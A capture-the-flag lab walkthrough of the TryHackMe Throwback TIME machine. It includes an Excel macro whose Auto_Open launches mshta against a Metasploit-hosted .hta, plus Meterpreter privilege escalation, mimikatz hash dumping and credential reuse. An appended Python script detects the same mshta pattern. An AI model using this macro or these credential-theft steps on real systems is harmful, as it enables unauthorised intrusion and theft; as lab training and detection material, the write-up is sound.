# TryHackMe-THROWBACK-TIME (100.20.34.176)

Since we ran a SOCKS4 proxy on port 1080, we use nmap along with proxychains to see if we can hit a port on the TIME machine.

So we can access the web page.

Going back to the MAIL machine to get the reset link by logging in as `MurphyF`:

`murphyf PASSWORD`

Now we need to update our `/etc/hosts` file.

We updated the password through the reset link and can log in with the new credentials.

Create a Microsoft Excel macro document containing this macro, using the Metasploit HTA server:

```
Sub HelloWorld()
    ' Launch mshta.exe against the .hta served by the Metasploit HTA server
    PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub

' Auto_Open runs automatically when the workbook is opened
Sub Auto_Open()
    HelloWorld
End Sub
```

Where that `.hta` is generated through Metasploit.

Upload that document.

You will get a shell.

By typing `sysinfo` we can see that we are on a 64-bit Windows architecture but in a 32-bit Meterpreter session, so we need to migrate to a 64-bit process.

Run the command `ps` to check the currently running processes.

Here we need to identify a process that is running as `NT AUTHORITY\SYSTEM` and is also 64-bit.

So we see this one satisfying our requirements.

And now we are the highest-privileged user, and our Meterpreter session is on 64-bit architecture.

We can now run commands like mimikatz and hashdump.

We have successfully dumped the hashes of the accounts on this machine.

Using proxychains, we SSH in with `Timekeeper`'s credentials.

Switch to the directory where `mysql.exe` is.

Using the password from the kerberoasted MySQL service account.

Save the list of usernames you found in the `domain_users` database.

We can utilize the same list of passwords we used to get access to Throwback's mail.
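
For the defensive side of the macro step above, where Excel's `Auto_Open` runs `mshta.exe` against a remote `.hta` URL: the following is an added example, not part of the original write-up, that flags that parent/child pattern in process-creation events. The field names follow Sysmon Event ID 1; the sample events, Office install paths and rule sets are constructed for illustration.

```python
import ntpath
import re

# Office apps should not normally spawn the script hosts listed below (assumed rule sets).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path or "").lower()

def classify(event):
    """Return (severity, reason) for one process-creation event, or None."""
    child = basename(event.get("Image"))
    parent = basename(event.get("ParentImage"))
    url = REMOTE_URL.search(event.get("CommandLine", ""))
    office_parent = parent in OFFICE_PARENTS
    if child == "mshta.exe" and url and office_parent:
        return ("high", f"{parent} spawned mshta.exe fetching {url.group(0)}")
    if child == "mshta.exe" and url:
        return ("medium", f"mshta.exe given remote URL {url.group(0)}")
    if office_parent and child in SCRIPT_HOSTS:
        return ("medium", f"{parent} spawned script host {child}")
    return None

def detect(events):
    """Yield (event, severity, reason) for every suspicious event."""
    for ev in events:
        verdict = classify(ev)
        if verdict:
            yield (ev, *verdict)

# Constructed sample events; only the mshta URL is taken from the macro on this page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": "mshta.exe http://10.50.31.16:8000/j4KCBrR.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Tools\local_help.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for _, severity, reason in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}")
```

The same parent/child condition can be expressed as a SIEM rule over Sysmon data; the local `.hta` launched from Explorer is deliberately left unflagged to show the rule keys on the Office parent and the remote URL.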